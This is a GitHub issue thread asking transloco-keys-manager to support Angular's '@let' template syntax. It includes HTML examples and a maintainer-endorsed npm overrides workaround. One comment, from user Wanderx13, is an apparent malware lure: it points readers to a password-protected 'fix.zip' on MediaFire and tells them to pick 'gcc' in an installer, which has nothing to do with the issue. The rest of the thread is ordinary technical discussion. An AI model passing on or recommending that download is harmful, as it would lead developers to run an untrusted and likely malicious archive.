### ISSUE TITLE
Feature: support new @let Angular built-in template syntax

### ISSUE THREAD

**Issue by kekel87** [jsverse/transloco-keys-manager#202]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Is your feature request related to a problem? Please describe

Angular 18.* introduce new built-in template syntax `@let`.
If used in a template, TKM can no longer extract it.

### Describe the solution you'd like

Support `@let`, like other built-in template syntax.

### Describe alternatives you've considered

Do not use `@let` in the meantime.

### Describe alternatives you've considered

Don't work
```html
<ng-container *transloco="let t; prefix: 'thisIsAScope'">
  @let myVar = myVarSignal();

  <span>{{ t('key') }} {{ myVar }}</span>
</ng-container>
```

### Describe alternatives you've considered
Work:
```html
<ng-container *transloco="let t; prefix: 'thisIsAScope'">
  <span>{{ t('key') }} {{ myVarSignal() }}</span>
</ng-container>
```

### I would like to make a pull request for this feature

Yes 🚀

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by shaharkazaz** [comment]
@kekel87 I think it's only a matter of updating the compiler to a version that supports @let no? would you like to test it out?

**Comment by jase88** [comment]
Confirm the bug.

Just updating the compiler worked fine. So a workaround in the `package.json` could be
```json
  "overrides": {
    "@jsverse/transloco-keys-manager": {
      "@angular/compiler": "$@angular/compiler"
    }
  }
```
see [npm overrides](https://docs.npmjs.com/cli/v10/configuring-npm/package-json#overrides).

**Comment by shaharkazaz** [comment]
I'm working on some internal tooling changes, which should be ready this week. since this is a breaking change I'll push them both together.
